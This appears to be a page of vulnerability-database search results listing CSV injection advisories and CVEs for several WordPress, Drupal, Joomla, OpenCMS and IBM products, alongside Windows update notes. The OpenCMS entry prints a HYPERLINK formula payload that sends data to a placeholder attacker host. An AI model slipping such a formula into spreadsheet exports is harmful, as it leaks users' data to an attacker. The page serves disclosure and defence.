5078 matches found
CVE-2019-11872
The Hustle aka wordpress-popup plugin 6.0.7 for WordPress is vulnerable to CSV Injection as it allows for injecting malicious code into a pop-up window. Successful exploitation grants an attacker with a right to execute malicious code on the administrator's computer through Excel functions as the...
TableField - Moderately critical - Access bypass and Cross Site Scripting - SA-CONTRIB-2019-051
This module allows you to attach tabular data to an entity. Access bypass There's no access check for users with an "Export Tablefield Data as CSV". They can export data from unpublished nodes or otherwise inaccessible entities. This vulnerability is mitigated by the fact that an attacker must ha...
Hustle <= 6.0.7 - Unauthenticated CSV Injection
The Hustle – Email Marketing, Lead Generation, Optins, Popups WordPress plugin was affected by an Unauthenticated CSV Injection security vulnerability...
CVE-2018-7201
CSV Injection was discovered in ProjectSend before r1053, affecting victims who import the data into Microsoft Excel...
Input validation
CSV Injection was discovered in ProjectSend before r1053, affecting victims who import the data into Microsoft Excel...
CVE-2018-7201
CVE-2018-7201 corresponds to a CSV Injection vulnerability in ProjectSend prior to version r1053. The issue arises when exporting/loading data for use in Microsoft Excel, enabling injection via CSV fields. Affected product: ProjectSend (before r1053). Root cause details are described only as a CS...
ProjectSend CSV Injection Vulnerability
ProjectSend, formerly known as cFTP, is a suite of self-hosted applications based on PHP and MySQL. A CSV injection vulnerability exists in versions prior to ProjectSend r1053 that affects victims who import data into Microsoft Excel...
May 19, 2019—KB4505051 (OS Build 10240.18218)
May 19, 2019—KB4505051 OS Build 10240.18218 Improvements and fixes This update includes quality improvements. Key changes include: Addresses an issue that may prevent access to some gov.uk websites that don’t support HTTP Strict Transport Security HSTS when using Internet Explorer 11 or Microsoft...
May 19, 2019—KB4505062 (OS Build 16299.1150)
May 19, 2019—KB4505062 OS Build 16299.1150 Reminder: March 12th and April 9th will be the last two Delta updates for Windows 10, version 1709. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please...
WordPress FV Flowplayer Video Player plugin <= 7.3.14.727 - CSV Export vulnerability
CSV Export vulnerability found in WordPress FV Flowplayer Video Player plugin versions <= 7.3.14.727. Solution: Update the WordPress FV Flowplayer Video Player plugin to the latest available version (at least 7.3.15.727)...
FV Flowplayer Video Player <= 7.3.14.727 - CSV Export
Changelog states: Security - fix for email subscription CSV export capability available to guest users...
May 14, 2019—KB4499165 (Security-only update)
May 14, 2019—KB4499165 Security-only update Improvements and fixes This security update includes quality improvements. Key changes include: Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as Microarchitectural Data Sampling , for 64-Bit x64...
May 14, 2019—KB4499158 (Security-only update)
May 14, 2019—KB4499158 Security-only update Improvements and fixes This security update includes quality improvements. Key changes include: Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as Microarchitectural Data Sampling , for 64-Bit x64...
RSMembership! older than 1.22.11 ,Other
RSMembership! older than 1.22.11,Other UpdateNotice URL https://www.rsjoomla.com/blog/view/468-csv-vulnerability-explained.html...
RSEvents! Pro (March 2019),Other
RSEvents! Pro March 2019,Other new version number 2.2.1 UpdateNotice URL https://www.rsjoomla.com/blog/view/468-csv-vulnerability-explained.html...
Findomain - A Cross-Platform Tool That Use Certificate Transparency Logs To Find Subdomains
A cross-platform tool that uses Certificate Transparency logs to find subdomains. We currently support Linux, Windows and MacOS. How does it work? The tool doesn't use the common methods for subdomain discovery; it uses Certificate Transparency logs to find subdomains, and this method makes the tool...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in the New User module for the parameters First Name and Last Name. Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp. Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
CVE-2019-4071
IBM Tivoli Storage Productivity Center IBM Spectrum Control Standard Edition 5.2.1 through 5.2.17 could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 157063...